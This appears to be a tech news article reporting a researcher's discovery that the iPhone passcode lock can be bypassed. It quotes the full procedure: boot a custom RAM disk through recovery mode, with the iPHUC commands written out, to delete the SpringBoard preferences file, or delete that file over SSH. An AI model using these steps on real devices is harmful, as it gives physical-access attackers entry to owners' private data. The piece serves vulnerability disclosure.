So you've set a passcode for your iPhone, and you're feeling smug and secure. You can leave the device unattended on your desk, or worse, have it stolen or lost without fear of prying eyes accessing your private data -- right?
As discovered by Jonathan Zdziarski, who has established himself as something of an iPhone forensics expert, the iPhone's passcode mechanism should leave you feeling neither smug nor secure, and represents little more than a mild deterrent for would-be viewers of your private data.
Zdziarski has outlined a three-step process for cracking the iPhone's passcode, as follows:
- Prepare a custom iPhone RAM disk. There are numerous How-To's out there to do this. Your custom RAM disk will need to mount /dev/rdisk0s2 (say, /mnt) and simply delete the file /mnt/mobile/Library/Preferences/com.apple.springboard.plist. This is the config file that tells springboard "passcode: on"
- Use the iPhone Utility Client to place the device into recovery mode and then boot the RAM disk using something like:
- (iPHUC Recovery) #: filecopytophone Bypass_Passcode.bin
- filecopytophone: 0
- (iPHUC Recovery) #: cmd setenv\ boot-args\ rd=md0\ -x\ -s\ pmd0=0x9340000.0xA00000
- (iPHUC Recovery) #: cmd saveenv
- (iPHUC Recovery) #: cmd bootx
- After your custom RAM disk blows away the springboard config, reboot the phone and the passcode will be circumvented, because SpringBoard's default is "no passcode"
As you can see, it's a process that requires some diligence and familiarity with iPhone hacking tools, but one that can be accomplished in mere minutes by anyone who has physical access to an iPhone.
"What a shame, that Apple went to the trouble of storing the passcode in the keychain, and yet the switch to turn it on and off is sitting in a little property list. You can test this on your own iPhone without all the trouble by simply ssh'ing into it and deleting this file by hand, then reboot."